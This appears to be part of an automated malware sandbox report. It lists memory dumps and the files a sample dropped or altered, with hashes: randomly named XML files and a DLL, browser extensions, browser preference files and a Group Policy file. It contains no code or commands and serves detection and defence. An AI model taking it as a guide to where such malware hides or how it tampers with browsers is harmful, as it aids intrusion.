SHA512 977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

memory/3560-54-0x0000000008150000-0x00000000084A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2d1693f4fad699421184209f7120ba60
SHA1 0ca9a49a4cd63e6b2ed42ca270f08b58930018da
SHA256 51fa436bb9f756a830e561b3cc031821f95a6ce18fd3fb1eca18ca9b63cff68d
SHA512 cd5ba051c2e85889a30cfdda8147e89bed10c52207eededae4d3bb916b43cd3b4faa7afb6ebee73ad9777fac867fc927beaccfe8d5dae5f3cc6a4a2723c36ca4

memory/3560-56-0x00000000085F0000-0x000000000863B000-memory.dmp

memory/1708-73-0x00000000074B0000-0x00000000074FB000-memory.dmp

memory/3624-96-0x0000000010000000-0x000000001328F000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2df78d7fe1cc5a750c30a423ce78ed91
SHA1 a06bdfea77fe55321a8d3b1dc6eebdc985203d67
SHA256 ff505835e3755a9dba4b6e57e5922267ffaa6826554ffce5d4be07bfc64e5715
SHA512 fc09437d991a241828d9dda06080b5842b65359f2b2dfb23e3b11b0e5c259a612ea51fd4a314d3b702d55668fd6c69c5d3e44d0c4cd9b52a6bbc2f4a9c24da37

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8bc09d1ed2221f09ab627863126fb145
SHA1 410f67f830a08de53f304af53603d8f7b7cbb118
SHA256 612a1b148d9434e238082cda5a6cf69a3ad016f51c2b239841e9984d8ca22bbe
SHA512 53ca097df2fc12dac16959f2f890036569e18382b7cbd281442df8d7df12f59e68fdd33d59cd6d69394abb999e4b1b1e5938938e9e78ba0d2895ef64c4a85828

memory/1264-135-0x000001FACE0F0000-0x000001FACE112000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dedf7e84b1b89aca68a6b339e7ccbffd
SHA1 4961fc3d0502b4f0d6b3607bfc26bfd5152e5505
SHA256 546cf8b25af4b4425ea29281aca89fe27902823e76e78d4816ac336789995928
SHA512 e6c66e15bf23056c21da42aed11deb9f5840a334193b29e41b074dbb3ca859410053018a9a38603968a37ed888fc57d6e86c35a7aa1bd781407673276971fa19

memory/1264-139-0x000001FACE2A0000-0x000001FACE316000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 56466acb0afb9583ecc6a1462962b12a
SHA1 e57a3af561275d24dbd81f51ea27ebe6461fd44c
SHA256 e451c8d11d8fada4730e914ec4c1ff9037af082439824e1d2549787e5242b89f
SHA512 009eaa5a7cd49910296c48d32a26db8a95c5f46d28a01c3e0ca99f5379299e78d1d1e8ee263d35a1b1e8090f135a4aa9084b5bade23accb108d943a72259fb4a

memory/3444-191-0x0000000010000000-0x000000001328F000-memory.dmp

memory/3444-203-0x00000000032A0000-0x0000000003325000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0fcf7da69b6e086c43b0632d607ab0dd
SHA1 54d1391f57dd3e041b4396d602fd1252503f9c84
SHA256 a61ad0b1e5b96624e3364e4c972e4dfd72f697ac3ccd84cb44973dae68590d8e
SHA512 f88006766443fe415c0a7f6a04278a573606039b35ae9fa9cd28a26e7c42bc31ec61cb4b07e6b93e348a5697ffa0d377d35036d1f8af0e72ed2b45692bfbcc64

C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 1476f7832994b3250a45189c8fa5aac7
SHA1 ee8e62ed24254219224cac81a9fc0a1441f80b9c
SHA256 e9c8b42d1f8f9f4b7da3a46c8631fffb9c34fb4b2200c949f12199c2c8992f73
SHA512 37b7a1da00bf4a41fd3461ad540e13b316d29b4f471ed51875661bb60cb672d42b4c35b0348db5c9f3fbbb651621dfb658ed09b2dcd88da0241b6079add76ec2

memory/3444-258-0x00000000039B0000-0x0000000003A16000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 cca515d7ac486d44419259cc805ee930
SHA1 b0ffec21a8724f81d26e1c42c94e48a3d50c8bf8
SHA256 8d00fc5d2302e59a4a1b99ae0217e4f1c73f6e09787f0905a7d383eb2232ae33
SHA512 442c721bd48788941606725eb226d29708a9455335aeba4e12569cab9075f590a5ee35c206d3a707bdb71c099e3dd59d1f78fa475258b3b615f97ccb09feaed0

C:\Program Files (x86)\ijLlchIpU\kjnuipy.xml

MD5 0e9cc6b7928e4949676e86f52346cdcd
SHA1 a6cc65c2aa28ec727ba82592c22e5ebc7e034fc8
SHA256 4f6ed87466a5d7c20aa29fae1879a81bdf79a388620ddf494755989c8bec764e
SHA512 59dde1b47a8f03460ad5b8effbaf5087b2787083122b1f6ba7ee0067449b6399e0bf788abfa35fb73b8ce955b6c7a53f5a6a403a82938c4323685d4d873e8189

C:\Program Files (x86)\RFIumDCEBXXU2\LFylShE.xml

MD5 281956cd14616f4a9ffd3724de4b0899
SHA1 42b5d68d0eca6c16ad62e02cba94e739f3571429
SHA256 a2aa9f7d46b15d7216dc6dc50525b48a4295d9a618d66876c4f3eb86a11415f4
SHA512 01d9c8413b02ae13b02849dfdfe005af2dcf9d70db6918b0f3d16a3a455f6a06f60cbb6947dfff042f1d5cb14a074388740aeeba8f508028e65e4cad80b5c488

C:\ProgramData\oBeyQrPqBvPiiLVB\FDZpIlg.xml

MD5 e1308c0b5821e2f803d63e60c7de6eea
SHA1 7b390a5267397071c671c3865ab209ec4bbc66bd
SHA256 1a1badab9e36d1b889ddd295b7df4a68e32572ffdb7a78becd02aac9f9c18f7b
SHA512 7becbebc41c5f4f6009e8b3bca0bce98e85ac36f941bddfb7cfc5c1dd9fbcf9acdc5656ca3bf6abfe593ccdc0e5f86a15b7a38fe3a9d17db50a2aaaa65464075

C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\vzWnlIa.xml

MD5 5114b0a78c1dd8b2c1967747b4d6efbf
SHA1 050fef1d0926084d52e7045ed41989e7a14d70b6
SHA256 101c1c20bf0ad50aa08adf1b39706324874ec163bfb60a966334aafa08813388
SHA512 35b3771f72516673f975576f5ab6c8d0c30f93fb71b8a5729a53078ff774a55f8ab7e32307d31bbd69f4fdaf02be9ba51d055bdd23af84c850495c4299730ec4

C:\Program Files (x86)\AClHKqYMJaBBC\atrxmZN.xml

MD5 a66cfc4cebd35b85006c422fcddb32a6
SHA1 f307667ec87e700775ff5d58d50e03391629f89a
SHA256 a25f90d94951ef6ddad08b35c00998b9473293eab6c2bceee250cde443649ea7
SHA512 fb990e02bfda55d981f0808652e23f02f6ba1445774e6453bd535de230cc81bcd97dc457f3c499a3957c6e78920771614c13e665d2f83611ec4d0ad8a925b55d

C:\Windows\Temp\gLbKcqvTyliDAKYm\UfvEZzvn\zxDgfHZ.dll

MD5 008d6162a1c3bee849545d99cdca4da7
SHA1 198ef7457efe566d6632b8dd69e601a70b62e106
SHA256 c83932d2ded84adb6da7d6b8c9683defa007adb9936a2425ee91b27d2594dc5b
SHA512 6a5ccb8cc635a37ef0925bc23267c40166c6f64674fa64fdee2532ae79d94920661056f1a3aa7d06e4aece5674bba3c17d8e3d67bbd7fa121b56d1e800634907

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\prefs.js

MD5 f302df63a8218990b77908c249d45b18
SHA1 29392740e4ef9df696d03fff06628e236c740526
SHA256 7c6325679ad69a58b14990ec38c46805f9c75bc65f6f8ed1361554d913da031d
SHA512 d0fc7cdac5c168d03074dda53f820ed0fff1e91ea3b7414acd5ffacdd1ba6575c588d65fa60a1869e29997ae01c83b1f831f0f4c45cfae3c7c6d2d6f7f20e6ce

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 19ea695a1fda48c6541c467c904ffa09
SHA1 b388687cc39c2ef19128db9f3871e3e67bcbde54
SHA256 a3eafcef1da91e6040bfaa4deafd605cd03474dc98daf00c70234222a0bbc9ff
SHA512 2857c80dbd0aada44cc2a4ef58ab93220082d00b32844fcc851923f486c92115916cdcd448e150c20461ab6639903ba57c586cce8c2b4d93b1197d3e9dc39611

memory/3444-441-0x0000000003A20000-0x0000000003AA4000-memory.dmp

memory/3444-452-0x0000000004360000-0x0000000004432000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 059dcf6535e95cf5ebf238776d7ced1a
SHA1 791777d26604b00a6eecee6052a137db6eec67f7
SHA256 5c55ff020a6af584585d1ac1f712469b1bcc11f3bbc0916eedc3bc6e410af48b
SHA512 35d7a81f49b8f3e2f1421f96886de0b9fc1c4a2900602653deed924ef95c6734b9f614a9e6513732a61e4dad7f8091d331bcd096782f5026103f627ffa476ae2

memory/2132-469-0x00000000041C0000-0x000000000744F000-memory.dmp